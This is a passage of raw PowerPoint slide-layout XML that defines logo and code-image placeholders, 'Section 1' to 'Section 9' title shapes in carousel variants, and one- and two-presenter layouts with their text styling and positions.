              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3A8EB5-2845-EE3C-A89B-DF51D17B7A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04902" y="-5133404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66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3" name="!!LOGO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19201" y="8531679"/>
            <a:ext cx="2598694" cy="515258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!CODE1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CF6EF23B-0EA8-370D-DD86-3BE41AD49A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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!CODE2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D74F07D0-04F0-F089-758A-528C8071E5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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!CODE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25D50483-88DA-306A-D4C7-968D5CD052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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="!!CODE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149CE04-4FC6-8CB5-1D61-C9D365BDF8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7178" y="0"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!SECTION1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818A8F22-A7A5-1DA7-642E-04BC43A933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5400" y="2952572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4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!SECTION2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4236819"/>
            <a:ext cx="15697200" cy="66903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sk-SK" sz="7000" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="!!SECTION3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3FBF56-33B9-1540-29A8-BF28CB5A50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5400" y="5398381"/>
            <a:ext cx="15697200" cy="66903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4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="!!!!SECTION4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826949C0-26C8-EB69-893B-6F594A0D4A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95400" y="6559943"/>
            <a:ext cx="15697200" cy="669030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>
              <a:defRPr lang="en-US" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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Section 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!SECTION5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6603F797-CF2C-4F48-F949-215C741EC2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95400" y="7598820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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!SECTION6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C60611-8CC4-3419-305E-4947EA93B2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8760382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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="!!SECTION7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FD4373-0B3D-0B82-68B9-092D2D5EA8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95400" y="9921944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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="!!SECTION8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAF7A12-50F4-17E6-A8F9-3EC368FD6C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5400" y="11083506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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="!!SECTION9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77011FDD-D4C1-10E1-FADD-F12F33D3DF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95400" y="12245074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9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18560580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- carousel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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3A8EB5-2845-EE3C-A89B-DF51D17B7A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04902" y="-5133404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66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3" name="!!LOGO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19201" y="8531679"/>
            <a:ext cx="2598694" cy="515258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!CODE1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CF6EF23B-0EA8-370D-DD86-3BE41AD49A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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!CODE2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D74F07D0-04F0-F089-758A-528C8071E5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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!CODE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25D50483-88DA-306A-D4C7-968D5CD052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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="!!CODE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149CE04-4FC6-8CB5-1D61-C9D365BDF8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7178" y="0"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!SECTION1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818A8F22-A7A5-1DA7-642E-04BC43A933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5400" y="1913207"/>
            <a:ext cx="15697200" cy="669030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>
              <a:defRPr lang="en-US" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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Section 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!SECTION2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3074769"/>
            <a:ext cx="15697200" cy="66903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sk-SK" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="!!SECTION3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3FBF56-33B9-1540-29A8-BF28CB5A50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5400" y="4236331"/>
            <a:ext cx="15697200" cy="66903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7000" b="1" i="0" baseline="0" dirty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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="!!!!SECTION4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826949C0-26C8-EB69-893B-6F594A0D4A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95400" y="5397893"/>
            <a:ext cx="15697200" cy="66903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4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!SECTION5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6603F797-CF2C-4F48-F949-215C741EC2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95400" y="6559455"/>
            <a:ext cx="15697200" cy="669030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>
              <a:defRPr lang="en-US" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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Section 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!SECTION6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C60611-8CC4-3419-305E-4947EA93B2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7598332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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="!!SECTION7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FD4373-0B3D-0B82-68B9-092D2D5EA8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95400" y="8759894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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="!!SECTION8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAF7A12-50F4-17E6-A8F9-3EC368FD6C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5400" y="9921456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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="!!SECTION9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77011FDD-D4C1-10E1-FADD-F12F33D3DF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95400" y="11083024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9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343980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- carousel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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3A8EB5-2845-EE3C-A89B-DF51D17B7A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04902" y="-5133404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66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3" name="!!LOGO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19201" y="8531679"/>
            <a:ext cx="2598694" cy="515258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!CODE1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CF6EF23B-0EA8-370D-DD86-3BE41AD49A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46501" y="3792725"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!CODE2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D74F07D0-04F0-F089-758A-528C8071E5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83098" y="2872994"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!CODE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25D50483-88DA-306A-D4C7-968D5CD052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9088" y="5561522"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="!!CODE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149CE04-4FC6-8CB5-1D61-C9D365BDF8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7178" y="0"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!SECTION1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818A8F22-A7A5-1DA7-642E-04BC43A933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5400" y="734321"/>
            <a:ext cx="15697200" cy="66903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4800" b="1" i="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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!SECTION2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1897999"/>
            <a:ext cx="15697200" cy="66479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>
              <a:defRPr lang="sk-SK" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="25000"/>
                  </a:schemeClr>
                </a:solidFill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marL="342900" lvl="0" indent="-342900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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="!!SECTION3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3FBF56-33B9-1540-29A8-BF28CB5A50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5400" y="3057445"/>
            <a:ext cx="15697200" cy="66903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4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="!!!!SECTION4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826949C0-26C8-EB69-893B-6F594A0D4A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95400" y="4219007"/>
            <a:ext cx="15697200" cy="66903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7000" b="1" i="0" baseline="0" dirty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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!SECTION5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6603F797-CF2C-4F48-F949-215C741EC2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95400" y="5380569"/>
            <a:ext cx="15697200" cy="66903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4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!SECTION6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C60611-8CC4-3419-305E-4947EA93B2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6542131"/>
            <a:ext cx="15697200" cy="669030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>
              <a:defRPr lang="en-US" sz="4800" b="1" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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Section 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="!!SECTION7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FD4373-0B3D-0B82-68B9-092D2D5EA8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95400" y="7581008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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="!!SECTION8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBAF7A12-50F4-17E6-A8F9-3EC368FD6C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5400" y="8742570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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="!!SECTION9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77011FDD-D4C1-10E1-FADD-F12F33D3DF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95400" y="9904138"/>
            <a:ext cx="15697200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lang="en-US" sz="4800" b="1" i="0" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="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Section 9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26325499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oami (One present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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF4A8C1F-FF82-3D40-282A-36C8F288DBBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1668239" y="-11137029"/>
            <a:ext cx="21767622" cy="19788746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66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sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7284204" y="2097970"/>
            <a:ext cx="3719592" cy="371959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1384300" y="6660422"/>
            <a:ext cx="15519400" cy="590931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" b="1" i="0" kern="1200" baseline="0" dirty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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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1384300" y="7116734"/>
            <a:ext cx="15519400" cy="68326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buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5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1384300" y="7985475"/>
            <a:ext cx="15519400" cy="974374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buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:alpha val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:buFontTx/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704350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9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2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iterate type="lt">
                    <p:tmAbs val="3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iterate type="lt">
                    <p:tmAbs val="3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4" grpId="0" build="p" advAuto="0"/>
    </p:bldLst>
  </p:timing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oami (Two presente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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66F0FBF4-B424-3EF5-0036-855F800B3E47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2789438" y="-7508659"/>
            <a:ext cx="16501604" cy="15001458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66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15" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32D69C3A-208F-E40B-86CD-5F6FA3A162AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026502" y="-7543337"/>
            <a:ext cx="16501604" cy="15001458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66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1600200" y="6682194"/>
            <a:ext cx="7330440" cy="590931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algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" b="1" i="0" kern="1200" baseline="0" dirty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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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1600200" y="7138506"/>
            <a:ext cx="7330440" cy="683264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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5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1600200" y="8035944"/>
            <a:ext cx="7330440" cy="923904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buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2000" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:buFontTx/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17D2C4B-BB96-469B-967F-9D2E184582D2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405624" y="2104242"/>
            <a:ext cx="3719592" cy="371959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949A86F7-01BC-45AE-A0E1-B7D130F24433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11173580" y="2104242"/>
            <a:ext cx="3719592" cy="371959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61FC5E7-8535-2893-5F72-F3DA0C4C6F0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57364" y="6682194"/>
            <a:ext cx="7330440" cy="590931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algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" b="1" i="0" kern="1200" baseline="0" dirty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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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9FD50A-8A24-D4EA-90DE-BA82CBCC028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57364" y="7138506"/>
            <a:ext cx="7330440" cy="683264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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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 algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFontTx/>
